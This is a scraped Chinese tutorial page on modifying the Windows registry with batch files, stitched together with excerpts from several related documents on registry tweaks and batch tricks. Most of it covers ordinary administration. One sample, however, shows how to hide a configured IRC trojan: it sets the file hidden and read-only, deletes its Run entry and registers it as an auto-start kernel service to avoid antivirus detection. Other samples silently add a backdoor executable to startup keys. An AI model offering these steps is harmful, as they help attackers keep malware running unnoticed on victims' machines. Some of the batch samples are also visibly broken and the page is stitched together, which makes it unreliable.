批处理修改注册表

如何用批处理修改注册表方法二则禁止使用命令提示符程序和批处理文件Windows 2000/XP下的命令提示符(即CMD.exe程序)相当于Windows 98下的MS-DOS程序。

出于系统本身安全考虑,应防止非法用户在命令提示符下或是利用批处理文件(BAT文件)对计算机进行破坏,这可通过修改注册表来实现。

选择【开始】→【运行】命令,在【运行】对话框的【打开】文本框中输入“regedit.exe”,单击【确定】按钮,运行注册表编辑器,依次打开以下键:HKEY_CURRENT_USER\Software\Policies\Microsoft\System在右边的窗口中新建一个DWORD值,其名称为DisableCMD,设数值数据为2,则表示命令提示符程序和批处理文件都不能被运行,其值为1,则只是禁止命令提示符的运行。

示例:echo REGEDIT4>iedown.regecho [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]>>iedown.regecho "1803"=dword:00000000>>iedown.reg以上生成REG文件.regedit /s iedown.regdel iedown.reg运行REG后删除之.还可以:写一个注册表文件,放在一个位置..然后批处理导入:@echo offregedit /s 注册表文件路径exit说明:/s是不弹出确认提示直接导入先学习一下如何使用.REG文件来操作注册表.(我们可以用批处理来生成一个REG文件)关于注册表的操作,常见的是创建、修改、删除。

1.创建创建分为两种,一种是创建子项(Subkey)我们创建一个文件,内容如下:Windows Registry Editor Version 5.00[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\hacker]然后执行该脚本,你就已经在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft下创建了一个名字为"hacker"的子项。

另一种是创建一个项目名称那这种文件格式就是典型的文件格式,和你从注册表中导出的文件格式一致,内容如下:Windows Registry Editor Version 5.00[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]"Invader"="Ex4rch""Door"=C:\\WINNT\\system32\\door.exe"Autodos"=dword:02这样就在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]下新建了:Invader、door、about这三个项目Invader的类型是"String value"door的类型是"REG SZ value"Autodos的类型是"DWORD value"2.修改修改相对来说比较简单,只要把你需要修改的项目导出,然后用记事本进行修改,然后导入(regedit /s)即可。

3.删除我们首先来说说删除一个项目名称,我们创建一个如下的文件:Windows Registry Editor Version 5.00[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]"Ex4rch"=-执行该脚本,[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]下的"Ex4rch"就被删除了;我们再看看删除一个子项,我们创建一个如下的脚本:Windows Registry Editor Version 5.00[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]执行该脚本,[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]就已经被删除了。

相信看到这里,.reg文件你基本已经掌握了。

那么现在的目标就是用批处理来创建特定内容的.reg文件了,记得我们前面说道的利用重定向符号可以很容易地创建特定类型的文件。

samlpe1:如上面的那个例子,如想生成如下注册表文件Windows Registry Editor Version 5.00[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]"Invader"="Ex4rch""door"=hex:255"Autodos"=dword:000000128只需要这样:@echo Windows Registry Editor Version 5.00>>Sample.reg@echo[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>Sample.re g@echo "Invader"="Ex4rch">>Sample.reg@echo "door"=5>>C:\\WINNT\\system32\\door.exe>>Sample.reg@echo "Autodos"=dword:02>>Sample.regsamlpe2:我们现在在使用一些比较老的木马时,可能会在注册表的[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run(Runonce、Runservices、Runexec)]下生成一个键值用来实现木马的自启动.但是这样很容易暴露木马程序的路径,从而导致木马被查杀,相对地若是将木马程序注册为系统服务则相对安全一些.下面以配置好地IRC木马DSNX 为例(名为windrv32.exe)@start windrv32.exe@attrib +h +r windrv32.exe@echo[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >>patch.dll@echo "windsnx "=- >>patch.dll@sc.exe create Windriversrv type= kernel start= auto displayname= WindowsDriver binpath=c:\winnt\system32\windrv32.exe@regedit /s patch.dll@delete patch.dll@REM [删除DSNXDE在注册表中的启动项,用sc.exe将之注册为系统关键性服务的同时将其属性设为隐藏和只读,并config为自启动]@REM 这样不是更安全.怎么用批处理命令删注册表里的键值或用命令的方法删注册表值?REG DELETE KeyName [/v ValueName | /ve | /va] [/f]KeyName [\\Machine\]FullKeyMachine 远程机器名- 忽略当前机器的默认值。

远程机器上只有HKLM 和HKU。

FullKey ROOTKEY\SubKeyROOTKEY [ HKLM | HKCU | HKCR | HKU | HKCC ]SubKey 所选ROOTKEY 下的注册表项的全名。

ValueName 所选项下的要删除的值的名称。

省略时,该项下的所有子项和值都会被删除。

/ve 删除空白值名称的值(默认)。

/va 删除该项下的所有值。

/f 不用提示就强行删除。

例如:REG DELETE HKLM\Software\MyCo\MyApp\Timeout删除注册表项Timeout 及其所有子项和值REG DELETE \\ZODIAC\HKLM\Software\MyCo /v MTU删除ZODIAC 上MyCo 下的注册表项MTUregedit.exe的参数filename 导入.reg 文件进注册表/s 导入.reg 文件进注册表(安静模式)/e 导出注册表文件例:regedit /e filename.reg HKEY_LOCAL_MACHINE\SYSTEM/L:system 指定system.dat/R:user 指定user.dat隐藏导入注册表信息用regedit /s 即可在DOS提示符下键入Regedit命令,将出现一个帮助屏幕。

此屏幕给出了其命令行参数及其使用方法。

语法:Regedit[/L:system][/R:user]filename1Regedit[/L:system][/R:user]/Cfilename2Regedit[/L:system][/R:user]/Efilename3[regpath]其中:/L:system指定system.dat文件的存放位置。

/L:user指定user.dat文件的存放位置。

filename1指定引入注册表数据库的文件名。

/Cfilename2指定形成注册表数据库的文件名。

/Efilename3指定导出注册表文件的文件名。

regpath指定导出注册表文件的开始关键字(缺省为全部关键字)现举几个例子说明regedit.exe在DOS下的使用方法。

【例1】将系统注册表数据库registry导出到reg1.reg文件中。

regedit/Ereg1.reg【例2】reg1.reg形成系统注册表数据库registry(全部)中。

regedit/Creg1.reg【例3】将reg.dat引入系统注册表数据库中(部分)。

regeditreg.dat【例4】将CJH开始的关键字导出注册表数据库,并命名为cjh.reg。

合集下载

批处理修改注册表

批处理修改注册表

批处理操作注册表教程1、reg add描述:将新的子项或项添加到注册表中。

语法:reg add KeyName [/v EntryName|/ve] [/t DataType] [/s separator] [/d value] [/f]参数:KeyName指定子项的完全路径。

忽略 ComputerName 会导致默认对本地计算机进行操作。

以相应的子目录树开始路径。

有效子目录树为 HKLM、HKCU、HKCR、HKU 以及 HKCC。

/v EntryName指定要添加到指定子项下的项名称。

/ve指定添加到注册表中的项为空值。

/t DataType指定项值的数据类型。

DataType 可以是以下几种类型:REG_SZREG_MULTI_SZREG_DWORD_BIG_ENDIANREG_DWORDREG_BINARYREG_DWORD_LITTLE_ENDIANREG_LINKREG_FULL_RESOURCE_DESCRIPTORREG_EXPAND_SZ/s separator指定用于分隔多个数据实例的字符。

当 REG_MULTI_SZ 指定为数据类型且需要列出多个项时,请使用该参数。

如果没有指定,将使用默认分隔符为 \。

/d value指定新注册表项的值。

/f不用询问信息而直接添加子项或项。

注意 :该操作不能添加子树。

该版本的 Reg 在添加子项时无需请求确认。

下表列出了 reg add 操作的返回值.值说明0 成功1 失败例子1:下列范例说明了如何使用 reg add 命令:reg add \hklm\software\myco /v data /t reg_binary /d fe340eadreg add "hkcu\software\microsoft\winmine" /v Name3 /t reg_sz /d Anonymousreg add "hkcu\software\microsoft\winmine" /v Time3 /t reg_dword /d 5例子2:reg add"HKCr\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command" /ve /t REG_EXPAND_SZ /f /d "\"C:\Program Files\InternetExplorer\iexplore.exe\""pause2、reg compare描述:比较指定的注册表子项或项。

批处理操作注册表完全攻略(读取注册表写入注册表等)

批处理操作注册表完全攻略(读取注册表写入注册表等)

批处理操作注册表完全攻略(读取注册表写⼊注册表等)⼀,批处理⽣成.Reg⽂件操作注册表 ⽤批处理中的重定向符号可以轻松地⽣成.reg⽂件。

然后⽤命令执⾏.reg⽂件即可! 这⾥,着重要了解.reg⽂件操作注册表的⽅法。

⾸先.reg⽂件⾸⾏必须是:Windows Registry Editor Version 5.00。

然后才是操作注册表的内容。

(就和从注册表中导出的⽂件格式⼀致) 1,创建⼦项 Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\TTT] 在HKEY_LOCAL_MACHINE\SOFTWARE\下创建了⼀个名字为“TTT”的⼦项。

2,创建⼀个项⽬名称复制代码代码如下: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\TTT] "Name"="TTT BLOG" "EMail"="taoether@" "URL"="/ttt/" "Type"=dword:02 这样就在[HKEY_LOCAL_MACHINE\SOFTWARE\TTT]下新建了:Name、EMail、 URL、Type这四个项⽬ Name、Email、URL的类型是“String Value” Type的类型是“DWORD Value” (附:windows注册表值类型: REG_SZ 字符串值 REG_BINARY ⼆进制值 REG_DWORD DWORD值 REG_MULTI_SZ 多字符串值 REG_EXPAND_SZ 可扩充字符串值) 3,修改键值 修改相对来说⽐较简单,只要把你需要修改的项⽬导出,然后⽤记事本进⾏修改,然后导⼊(regedit /s)即可。

注册表修改指南

注册表修改指南

1 提高子菜单速度位置:HKEY_CURRENT_USER\Control Panel\Desktop键值名:Menushowdelay双击键值Menushowdelay后,弹出该键值的编辑窗口,在文本输入框内输入“0”后,再单击“确定”按钮即可。

注意在系统默认的菜单弹出效果下,不易感觉到菜单弹出速度的提高;这时,请在桌面上单击“属性”命令,弹出“显示属性”窗口,然后在“效果”标签下将“动画显示菜单和工具提示”下的“淡入淡出效果”改为“滚动效果”。

2 去掉“关闭系统”位置:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ Explorer键值名:NoClose取值:1为隐藏、0为显示3 自动刷新窗口内容位置:HKEY_LOCAL_MACHINE\System\Currentcontrolset\Control\Update键值名:UpdateMode取值:0、1若“UpdateMode”键值为0,则设置为自动刷新,若“UpdateMode”键值为1,则设置为手工刷新;这等于在资源管理器窗口内按“F5”键或者在“查看”菜单中选择“刷新”命令。

4 去掉“设置”一位置:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ Explorer键值名:NoSetFolders取值:1为隐藏、0为显示二位置:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ Explorer键值名:NoSetTaskbar取值:1为隐藏、0为显示5 去掉升级位置:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ Explorer键值名:NoCommonGroups取值:1为隐藏、0为显示6 去掉“文档”位置:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ Explorer键值名:NoRecentDocsMenu取值:1为隐藏、0为显示7 自动清除“文档”位置:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ Explorer键值名:ClearRecentDocsOnExit取值:1为自动清除、0为不自动清除8 去掉“查找”位置:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ Explorer键值名:NoFind取值:1为隐藏、0为显示9 锁定“文档”位置:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ Explorer键值名:NoRecentDocsHistory取值:1为锁定、0为不锁定10 去掉“运行”位置:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ Explorer键值名:NoRun取值:1为隐藏、0为显示11 搜索“自启动”程序位置:HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run在注册表内,我们可以查询系统启动后加载了哪些程序。

dos(cmd)中删除、添加、修改注册表命令

dos(cmd)中删除、添加、修改注册表命令

dos(cmd)中删除、添加、修改注册表命令regedit的运⾏参数REGEDIT [/L:system] [/R:user] filename1REGEDIT [/L:system] [/R:user] /C filename2REGEDIT [/L:system] [/R:user] /E filename3 [regpath]/L:system Specifies the location of the SYSTEM.DAT file./R:user Specifies the location of the USER.DAT file.filename1 Specifies the file(s) to import into the regist/C filename2 Specifies the file to create the registry from./E filename3 Specifies the file to export the registry to.regpath Specifies the starting registry key to export from.(Defaults to exporting the entire registry)./S (Windows) Silent - no message on completion.从Windows命令⾏快速操作注册表 每⼀个熟悉Windows的⼈都相信,通过注册表⼏乎可以做到任何事情,真正的问题是怎样迅速找到正确的注册键。

绝⼤多数情形下,操作注册表意味着找到某个特定的⼦键;偶尔地,可能需要修改⼀下⼦键的名称(例如,可能要进⾏结构上的改动)。

那么,怎样才能迅速找到正确的⼦键并执⾏修改?另外,如果你不仅要改动本地机器的注册表,⽽且还要对远程机器作同样的修改,该怎么办?本⽂告诉你⼀个好⼯具Regfind。

注册表修改与编辑

注册表修改与编辑

1提高子菜单速度位置:HKEY_CURRENT_USER\Control Panel\Desktop键值名:Menushowdelay双击键值Menushowdelay后,弹出该键值的编辑窗口,在文本输入框内输入“0”后,再单击确定2 去掉“关闭系统”位置:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer 键值名:NoClose取值:1为隐藏、0为显示3 自动刷新窗口内容位置:HKEY_LOCAL_MACHINE\System\Currentcontrolset\Control\Update键值名:UpdateMode取值:0、1若“UpdateMode”键值为0,则设置为自动刷新,若“UpdateMode”键值为1,则设置为手工刷新;这等于在资源管理器窗口内按“F5”键或者在“查看”菜单中选择“刷新”命令。

4 去掉“设置”位置:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer 键值名:NoSetFolders取值:1为隐藏、0为显示5 去掉升级位置:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer 键值名:NoCommonGroups取值:1为隐藏、0为显示6 去掉“文档”位置:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer 键值名:NoRecentDocsMenu取值:1为隐藏、0为显示7 自动清除“文档”位置:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer 键值名:ClearRecentDocsOnExit取值:1为自动清除、0为不自动清除8 去掉“查找”位置:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer 键值名:NoFind取值:1为隐藏、0为显示9 锁定“文档”位置:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer 键值名:NoRecentDocsHistory取值:1为锁定、0为不锁定10 去掉“运行”位置:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer 键值名:NoRun取值:1为隐藏、0为显示11 去掉“注销”位置:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer 键值名:NoLogOff取值:1为隐藏、0为显示12 隐藏桌面位置:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion \Policies\Explorer键值名:NoDesktop取值:0、113 去掉“网上邻居”位置:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer 键值名:NoNetHood取值:1为隐藏、0为显示14 关闭系统版本号位置:HKEY_CURRENT_USER\Control Panel\desktop键值名:PaintDesktopVersion取值:0为隐藏、1为显示15 活用Enter键位置:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVer n键值名:取值:0保留原功能,输入法不处理、1等同于Esc键,用于清除当前外码输入状态说明:当取值为1时,如果有候选窗口,会自动隐藏输入窗口,清除所有外码,但不隐藏外码输入窗口。

禁止上网用批处理解禁注册表

禁止上网用批处理解禁注册表

禁止上网用批处理解禁注册表:reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools保存为.bat格式的,双击运行。

解禁注册表------1.使用软件禁用注册表比如:(此间文字由系统自动屏蔽)2.通过.reg文件(适用98系统,XP/2003下,禁用注册表后是无法导入reg文件的)把下面的内容复制到记事本,另存为扩展名为reg的文件,双击后,注册表解禁REGEDIT4[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System] "DisableRegistryTools"=dword:000000003.通过.vbs文件把下面的内容复制到记事本,另存为扩展名为vbs的文件,双击后,注册表解禁Dim WSHShellSet WSHShell=WScript.CreateObject("WScript.Shell")WSHShell.RegDelete"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\"4.通过.inf文件把下面的内容复制到记事本,另存为扩展名为inf的文件,右键选择安装,注册表解禁[Version]Signature="$Chicago$"[DefaultInstall]DelReg=DeleteMe[DeleteMe]HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableRegistryT ools"5.通过.js文件把下面的内容复制到记事本,另存为扩展名为js的文件,双击后,注册表解禁var WSHShell=WScript.CreateObject("WScript.Shell");WSHShell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DiableRegistry Tools" ,0,"REG_DWORD");WSHShell.RegDelete("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\");6.命令行下解禁注册表命令:reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools7.在Windows 2000/XP/2003中,运行Gpedit.msc,打开“组策略”。

注册表的修改

注册表修改技巧开始→运行→输入Regedit (或按“WIN+R”组合键),即可打开注册表。

1.IE默认连接首页被修改(按“WIN+R”组合键,打开注册表)IE浏览器上方的标题栏被改成“欢迎访问……网站”的样式,这是最常见的篡改手段,受害者众多(1)展开注册表到:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main,在右半部分窗口中找到串值“Start Page”双击,将Start Page的键值改为“about:blank”(或改为/即可);(2)同理,展开注册表到:HKEY_CURRENT_USER\ 路径同上 \Main,在右半部分窗口中找到串值“Start Page”,后面同上。

重新启动计算机,一切OK了(3)特殊例子:当IE的起始页变成了某些网址后,就算通过选项设置修改好了,重启以后又会变成他们的网址。

其实他们是在你机器里加了一个自运行程序,它会在系统启动时将你的IE起始页设成他们的网站。

开始→运行→Regedit→依次展开HKEY_LOCAL_ MACHINE\Software\Microsoft\Windows\Current Version\Run主键,然后将其下的registry. ex e子键删除,然后删除自运行程序c:\Program Files\registry.exe,最后从IE选项中重新设置起始页就好了。

IE首页防修改方法IE首页被恶意修改后,会自动连接到恶意网页的地址。

只要改造一下IE浏览器就不怕被修改了。

进入IE安装目录下(默认是C:\Program Files\InternetExplorer 下),找到iexplore.exe 文件,右击该文件在弹出菜单中选择“发送到”→“桌面快捷方式”。

然后右击桌面上的Iexplore.exe 快捷方式,在弹出菜单中选择“属性”,在“目标”框里填入:"C:\ P r o g r a m F i l e s \ Internet Explorer\IEXPLORE.EXE" -nohome,然后点击“确定”按钮退出即可。

如何用批处理修改注册表权限

如何用批处理修改注册表权限@echo offif exist regset.ini @del /q /f regset.iniecho HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main [1 8 19] >regset.iniregini regset.ini@del /q /f regset.inipauseRegini 命令行下修改注册表以及注册表权限使用方法C:\>regini regset.iniHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cu rrentVersion\Run [17]把run项设为只允许system控制其他用户不可控制 [17] 为控制参数其他参数看帮助1 - Administrators Full Access2 - Administrators Read Access3 - Administrators Read and Write Access4 - Administrators Read, Write and Delete Access5 - Creator Full Access6 - Creator Read and Write Access7 - World Full Access8 - World Read Access9 - World Read and Write Access10 - World Read, Write and Delete Access11 - Power Users Full Access12 - Power Users Read and Write Access13 - Power Users Read, Write and Delete Access14 - System Operators Full Access15 - System Operators Read and Write Access16 - System Operators Read, Write and Delete Access17 - System Full Access18 - System Read and Write Access19 - System Read Access20 - Administrators Read, Write and Execute Access21 - Interactive User Full Access22 - Interactive User Read and Write Access23 - Interactive User Read, Write and Delete Access更改RUN为只读HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Run [2 8 19]HKEY_CURRENT_USER\Software\Microsoft\Windows\Curren tVersion\Run [2 8 19]@Echo OffTITLE 注册表权限设置V1.1 :START ClsEcho 权限代码表Echo ---------------------------------------Echo 1 - Administrators 完全访问Echo 2 - Administrators 只读访问Echo 3 - Administrators 读和写入访问Echo 4 - Administrators 读、写入、删除访问Echo 5 - Creator 完全访问Echo 6 - Creator 读和写入访问Echo 7 - everyone 完全访问Echo 8 - everyone 只读访问Echo 9 - everyone 读和写入访问Echo 10 - everyone 读、写入、删除访问Echo 11 - Power Users 完全访问Echo 12 - Power Users 读和写入访问Echo 13 - Power Users 读、写入、删除访问Echo 14 - System Operators 完全访问Echo 15 - System Operators 读和写入访问Echo 16 - System Operators 读、写入、删除访问Echo 17 - System 完全访问Echo 18 - System 读和写入访问Echo 19 - System 只读访问Echo 20 - Administrators 读、写、执行访问Echo 21 - Interactive User 完全访问Echo 22 - Interactive User 读和写入访问Echo 23 - Interactive User 读、写入、删除访问Echo -----------------------------------------Echo.Echo ## 例如:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVer sion\Run [2 8 19]Echo ## 这里的[2 8 19] 是权限的代码号码,由自己输入。

windows_组策略批处理注册表__概述说明

windows 组策略批处理注册表概述说明1. 引言1.1 概述:本文将介绍Windows组策略批处理注册表的相关知识和应用。

在现代计算机系统中,配置管理和安全控制是至关重要的任务,而Windows组策略批处理注册表为我们提供了一种有效的方式来实现这些目标。

通过使用Windows组策略批处理注册表,我们可以轻松地进行配置管理并实施安全控制,从而提高系统的稳定性、安全性和可靠性。

1.2 文章结构:本文共包含五个主要部分。

首先,在引言部分中,我们将对文章进行概述并介绍文章结构。

接下来,在第二部分中,我们将详细讨论什么是Windows组策略批处理注册表以及它的好处和应用场景。

第三部分将介绍如何使用该技术来实现配置管理和安全控制,并提供相应的步骤和方法说明。

在第四部分中,我们将列举并解决常见问题,帮助读者更好地理解和应用该技术。

最后,在结论部分,我们将总结主要观点,并展望未来该领域的研究和应用发展。

1.3 目的:本文旨在为读者提供关于Windows组策略批处理注册表的详细说明和应用指南。

通过深入了解该技术的原理、优势和适用场景,读者将能够更好地应用该技术来进行系统配置管理和安全控制。

这篇文章还将解决一些常见问题,并提供相应的解决方案,帮助读者克服在实践中可能遇到的困难。

通过本文的阅读,读者将能够全面了解并有效地使用Windows组策略批处理注册表来提高系统效率和安全性。

2. windows 组策略批处理注册表2.1 什么是Windows组策略批处理注册表Windows组策略批处理注册表是一种系统管理工具,用于集中管理和配置Windows操作系统中的组策略设置。

它基于注册表的概念,通过修改系统注册表中的键值对来实现对系统配置和行为的控制。

通过使用组策略批处理注册表,管理员可以轻松地在多台计算机上进行统一的配置管理,并确保这些计算机遵循特定的安全规范和政策。

2.2 使用Windows组策略批处理注册表的好处Windows组策略批处理注册表提供了许多好处:1) 集中化管理:通过使用组策略批处理注册表,管理员可以将所有需要进行配置管理和安全控制的计算机集中起来,从而便于统一管理和维护。

DOS命令之批处理注册表

夜行人收藏Wikipedia,自由的百科全书目录1 综述2 与汇编集成2.1 早期方法2.2 传统的echo大法2.3 方便的prompt大法2.4 经典的more大法2.5 强悍的ASCode2.6 巧妙的.com文件头3 与VBS集成3.1 传统的echo大法3.2 国外的find大法3.3 经典的more大法3.3.1 Vacum 的方法3.4 方便的mshta大法3.5 让WSH直接解析bat4 与.NET语言集成5 与其他语言集成6 附加信息综述脚本类语言作为21世纪的一种先进的高级语言,其特征是整合(glue),批处理有极强的其他语言整合能力,目前比较成熟的方案有下面所述几种,通过和其他计算机语言的整合,极大的扩展批处理的功能,使得原本用批处理不可能实现的工作,通过整合汇编/VBS/.NET 可以轻松达到惊人的效果。

与汇编集成传统的DOS和经典的CMD都支持一个外部命令debug所以使得批处理有了汇编方面的扩展能力,debug命令支持重定向输入代码,所以给了代码极大的灵活性早期方法早期的批处理功能十分弱,甚至嵌用汇编也不是那么直接,比如自嵌后直接重定向的例子@echo offgoto starte 100 B0 13 CD 10 C4 2F AA 13 C7 64 13 06 6C 04 50 B4 01 CD 16 58 74 F0 B8 03 00 CD 10 C3r cx1cn mini_wq:startdebug < %0 >nulmini_del mini_pausefind反过滤的例子它的优势在于可以通过find过滤嵌入多个脚本@echo offe 100 B0 13 CD 10 C4 2F AA 13 C7 64 13 06 6C 04 50 B4 01 CD 16 58 74 F0 B8 03 00 CD 10 C3r cx1cn mini_wq@find "@" /v < %0 | debug >nul@mini_@del mini_@pause传统的echo大法通过echo命令重定向标准输出到临时文件,然后用debug执行这个临时文件里的命令,这个方法比较通用,批处理输出文件都是用的这个方法,不足是需要产生临时文件论坛讨论 (/forum/viewthread.php?tid=23573)echo D C000:000> v.datecho D>>v.datecho D>>v.datecho Q>>v.datDebug.exe < v.dat >info.txt@echo offecho o 70 17 >tmp.txtecho o 71 ff >>tmp.txtecho Q >>tmp.txtdebug <tmp.txtdel tmp.txt方便的prompt大法prompt命令支持一个特殊的参数$_ ,改参数表示换行,所以在批处理中灵活应用可以写出紧凑的汇编代码论坛讨论 (/forum/viewthread.php?tid=26591)echo exit|%ComSpec% /k prompt e 100 B4 00 B0 12 CD 10 B0 03 CD 10 CD 20 $_g$_q$_|debug>nul经典的more大法more支持一个+n 参数,表示从文件的指定行开始输出,我们利用这个参数把批处理本身尾部的一些汇编代码直接通过| 管道直接输出到debug命令,该方法最早可能是论坛网友上[doscc (/forum/viewpro.php?uid=52853)]提出的论坛讨论 (http:// /forum/viewthread.php?tid=21950)<"%~f0" more +2 |debug & goto:eofe100 B0 13 CD 10 C4 2F AA 11 F8 64 13 06 6C 04 EB F6rbxrcx10n wq强悍的ASCodeASCode论坛讨论 (/forum/viewthread.php?tid=26795)@echo offchcp 437>nul&graftabl 936>nulecho hP1X500P[PZBBBfh#b##fXf-V@`$fPf]f3/f1/5++u5x>set /p password=请输入密码:<nulfor /f "tokens=*" %%i in ('') do set password=%%idel echo.echo The Password is:"%password%"pause这类汇编程序的特殊性在于,所有的代码全部分布于ASCII码表的可显示字符范围中,当然这样的程序不是碰巧得到的,而是人为的构造出来的,其中需要用到许多技巧。

  1. 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
  2. 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
  3. 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
相关文档
最新文档